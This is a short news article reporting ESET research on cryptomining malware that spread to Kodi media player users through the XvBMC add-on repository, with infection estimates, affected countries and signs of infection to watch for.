According to researchers from the cybersecurity company ESET, users of the open source Kodi media player are at risk of being caught up in a cryptomining campaign. Researchers note that the source of the cryptomining campaign comes from a repository in the Netherlands that was shut down for copyright infringement. The repository for third-party add-ons, named XvBMC, has long been suspected to be linked to cybercrime like malware and DDoS attacks, but this is the first verified instance of malicious activity.
The cryptomining malware is coded primarily in Python and was, according to ESET, likely inserted into the Kodi media player around December 2017. Further analysis showed the following:
The malware has a multi-stage architecture and employs measures to ensure that its final payload — the cryptominer — cannot be easily traced back to the malicious add-on. The cryptominer runs on Windows and Linux and mines the cryptocurrency Monero (XMR). We have not seen a version in the wild that targets Android or macOS devices.
Though the repository has been shut down and no other users will be threatened at this time, the rough estimate is that at least 5,000 machines have been infected and users are unaware of the infection. ESET’s analysis showed that the majority of victims are localized in five countries: the United States, Israel, Greece, the United Kingdom, and the Netherlands. As this is the case, it is vital that any user who has downloaded the Kodi media player errs on the side of caution and performs a thorough malware scan. Some signs of infection to look out for include battery life on mobile devices depleting rapidly, slower overall speed, and overheating, which indicates a machine is being taxed.
The lesson to learn here is that third-party website downloads are more or less like playing Russian roulette with your machine. You may very well escape unscathed, but there is also the possibility of the chamber being loaded when you pull the metaphorical trigger.
Featured image: Shutterstock